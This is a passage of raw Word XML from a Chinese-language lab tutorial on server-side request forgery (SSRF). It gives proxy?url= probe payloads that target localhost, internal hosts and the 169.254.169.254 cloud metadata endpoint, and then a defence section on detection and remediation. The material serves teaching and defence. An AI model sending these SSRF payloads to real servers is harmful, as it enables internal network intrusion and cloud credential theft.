      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中访问：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;TARGET_IP&gt;/proxy?url=http://example.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预期（②）：返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">example.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内容，证明服务器确实在执行服务端端请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤二：尝试内网探测（概念验证）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。修改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">url</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数为已知的内部服务地址（②环境相关，实际地址因靶机网络拓扑而异）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;TARGET_IP&gt;/proxy?url=http://localhost/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;TARGET_IP&gt;/proxy?url=http://127.0.0.1:8080/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;TARGET_IP&gt;/proxy?url=http://&lt;INTERNAL_SERVICE_HOST&gt;/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（占位</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;INTERNAL_SERVICE_HOST&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如靶机内网中某运行的管理面板：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.100:8080/admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。②环境相关：DVWA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">默认不附带</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶场模块，需使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Academy SSRF lab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或自建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">容器模拟包含内部服务的环境。）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤三：尝试云元数据端点（概念验证，②仅限模拟环境）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;TARGET_IP&gt;/proxy?url=http://169.254.169.254/latest/meta-data/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③预期现象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（②因环境而异，占位）：若靶机运行在模拟云环境中（或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络安排的元数据服务模拟器），响应中可能包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">格式的实例元数据。若靶机为物理机或未配置相应服务，该请求将超时或返回错误——这也说明了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的危害与部署环境密切相关。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">④常见排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：请求返回“连接被拒绝”或超时——说明该地址不可达，但不证明不存在漏洞（可能仅是目标端口未开放）；响应为空白但状态码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">200——可能为盲</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF，需借助</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">带外记录（Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Collaborator）或时序探测来确认；现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">库对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的解析可能拒绝</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">file://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gopher://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等危险协议，限制攻击面（此为防御行为）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：SSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的检测与修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击手法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：利用用户可控的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数或请求体字段，诱导服务器向攻击者选定的目标（内网服务、云元数据端点等）发起服务端端请求，滥用服务器的网络访问权。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络流量审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：监控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器进程对外发起的连接。异常指标包括：向内部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">段（RFC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1918 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">私有地址</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.0.0/8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.0.0/12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.0.0/16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、回环地址</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.0/8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）以及云元数据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">169.254.169.254</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及变体）的出站请求。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">应用日志分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：审查所有“由用户输入决定服务器发起请求”的功能点的日志，寻找异常的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目标（IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址格式、非标准端口、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localhost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">查询审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者可能借助盲</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">触发到受控域名的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求以带外泄露数据（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user-data.attacker.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器发起的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询进行异常模式检测。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队修复（纵深防御）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">出站请求白名单（核心防御，①标准通用原理）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：严格限制服务器可发起出站请求的目标域名或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">范围（如仅允许必需的第三方</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">域名）。拒绝一切用户提供的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址（包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IPv4/IPv6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及十进制/十六进制变体），拒绝以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localhost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或内部域名为目标的请求。若必须支持任意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">URL，则应部署在独立、无内网访问权的网络段。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">禁止访问内网段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在服务器所在网络层（主机防火墙</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables/安全组/ACL）配置出站规则，阻止</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用进程向私有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">段和元数据端点发起连接。此措施可从网络层兜底，即使应用层校验被绕过，连接也无法建立。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">禁用危险协议与重定向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在后端</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">客户端配置中，仅允许</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议，显式禁用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">file://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gopher://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dict://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等可能被</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用的协议。同时，禁止库自动跟随</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重定向（302/301），以防止攻击者通过其控制的外部服务器做重定向跳板，绕过域名白名单。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">元数据服务保护</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（②环境相关：对云环境部署至关重要）：升级至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IMDSv2（AWS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Instance Metadata Service </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">v2），要求通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PUT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求获取临时</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">才能访问元数据，简单的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求将被拒绝。此配置可有效防御由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">触发的典型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">不依赖响应回显</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：即使服务器不将请求结果回显给用户（无直接回显），SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">依然可能通过时序、错误消息、或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
